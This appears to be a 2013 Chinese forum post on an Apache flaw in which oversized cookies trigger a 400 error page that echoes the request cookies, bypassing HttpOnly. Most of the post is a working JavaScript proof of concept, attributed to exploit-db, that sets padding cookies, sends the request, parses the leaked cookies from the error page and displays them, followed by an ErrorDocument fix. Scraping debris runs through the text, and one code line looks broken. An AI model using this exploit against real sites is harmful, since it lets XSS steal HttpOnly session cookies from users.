很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。' m' y, ~" T5 \% f& H
1 m/ S) S8 t' Q* J/ X. B
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:) G" I: I3 u+ `. F$ E
7 w1 U7 S0 S9 p; [& R! h8 B/ \/ E/ E$ R; a- k1 l
// http://www.exploit-db.com/exploits/18442/
0 @2 M5 ^- r V: \function setCookies (good) {
4 l. n6 }' o) {. F// Construct string for cookie value
, f& B( c/ v z: s+ y1 Jvar str = "";4 c$ [& Y4 V! e# x
for (var i=0; i< 819; i++) {$ b3 y- T$ F+ W" ?. c
str += "x";5 a% T: r9 R7 g% s- z
}- z: x5 I! u" T; ?% Z/ C' F: k
// Set cookies# X3 g' \4 O4 g/ ~1 C% H
for (i = 0; i < 10; i++) {
" I6 u0 C+ p7 x4 ^2 g3 O// Expire evil cookie1 D/ C, w. D% `' c' P9 [
if (good) {9 B! n) v8 ?# z5 l: d- t0 Z
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
8 h5 |- d# e e+ J}1 \7 R7 @9 z K, n( _; j
// Set evil cookie, E. U3 n& T! c! d
else {) E$ g; E$ t$ y/ P$ a
var cookie = "xss"+i+"="+str+";path=/";* F& C. x9 o9 a: R) m3 J; X+ c9 A
}; ?: j% W, Z4 s9 e1 b
document.cookie = cookie;4 Y- n I- Q; H+ c$ @
}; p6 G3 u+ m8 Q: f* C* D
}
^4 z% i" Z; \- \4 Ofunction makeRequest() {' Q+ z; _9 P2 c7 q
setCookies();- t {5 J; c4 i8 p+ O
function parseCookies () {5 Y; W% b8 Q& X: w0 l( r. N
var cookie_dict = {};* x& `) R/ S0 ~; h; i
// Only react on 400 status: ^0 |8 z. N0 N r5 Z+ h1 S
if (xhr.readyState === 4 && xhr.status === 400) {
6 U, J* O# V4 c9 I# _// Replace newlines and match <pre> content
7 d6 h, t; \$ s( Vvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);- V$ v" j; O+ B' {, ?% @. y, G
if (content.length) {
4 b' \+ y1 i2 v. U# c! \// Remove Cookie: prefix" |/ z+ G5 j8 u7 d* |& Q
content = content[1].replace("Cookie: ", "");# g2 Z9 g: |7 ]9 T* l; n6 N
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
! B+ y9 c7 L. C8 I4 l- ?9 r! }// Add cookies to object7 @. L6 ]# x1 f0 w( H v _
for (var i=0; i<cookies.length; i++) {
. f. H* b3 A5 m$ r" C ?4 X& Gvar s_c = cookies.split('=',2);4 [; d4 i4 C0 y3 E% e% o+ y+ B1 p
cookie_dict[s_c[0]] = s_c[1];
, W* u- b, Z3 e( k# K}! b0 Q6 {8 n/ @" {2 i
}4 w! B$ u" w! @; b6 G$ s1 S9 m
// Unset malicious cookies
/ `& Q, j! Y% X. @' f B9 RsetCookies(true);4 e$ b8 X( N m# c. ~" ^
alert(JSON.stringify(cookie_dict));$ [. v6 z) @$ H: c( V
}$ B/ B8 l3 Q& I f) U8 f
}
' }$ X' t) _& b: t2 f2 ~1 o/ p// Make XHR request' k$ H; y' A) }+ e5 M3 @
var xhr = new XMLHttpRequest();
! `) H- \ g* v2 U% V9 n9 b: {xhr.onreadystatechange = parseCookies;
# Y8 `4 w$ q9 ~; N$ b) Y" P! zxhr.open("GET", "/", true);) M. M. a) v4 [$ Z6 D
xhr.send(null);7 p- \7 u- p) m9 ^/ I: X
}
7 {7 Q' u1 _7 x9 M4 cmakeRequest();
0 j) Q& Q; k3 I) y6 a* z V3 z7 |, C8 [3 Q: G" o7 m/ w" @$ y. l- V+ ?
你就能看见华丽丽的400错误包含着cookie信息。9 j% U: w; z" G9 q9 {
( o7 J% e- O" _ _/ [
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download# L. `5 Q: v. x; s: i' X) z8 B4 Z
9 Z# G; \3 G, g1 L5 N7 R9 ~修复方案:
* y9 ?4 l4 W/ A% q0 w" w7 ~
; z8 {) g: }$ f0 D. ^ w& [8 AApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
% @. \% l0 a6 f: S5 `
, c; k- g9 ~& z aIn the event of a problem or error, Apachecan be configured to do one of four things,
2 H' s8 i( b6 r+ R9 a& ?- R$ Y
% E1 ?7 d: K" B+ c3 H; j1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
4 A& y. G# {' Z1 e2. output acustomized message输出一段信息
, _8 A9 a2 T$ o! W5 e, @+ a3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
: n, ~+ d; v) f, y3 c( n4. redirect to an external URL to handle theproblem/error转向一个外部URL
6 b: S# V9 T6 a/ O6 s& |6 r" r
2 z( d, |; |1 E* ?经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
4 j$ C& }. N0 e/ Y" |
3 @9 A. B; R% q5 J i/ T) P' nApache配置:
! g- A0 l6 V9 C7 o+ z ^( h5 ]9 J( U, ]' P. ?: W. @2 | e0 B
ErrorDocument400 " security test"8 [' r8 {+ w7 k! [3 |
- V- G1 ?% e/ s L4 O- Q' a
当然,升级apache到最新也可:)。
! a' h) A; ~% q2 _2 E7 a t4 U+ J* J, p/ ?
参考:http://httpd.apache.org/security/vulnerabilities_22.html
/ F5 [& k4 m% _/ N9 ?1 d S- \5 ^5 Y, d0 ~& `
|
发表于 2013-4-19 19:15:43
收藏
支持
反对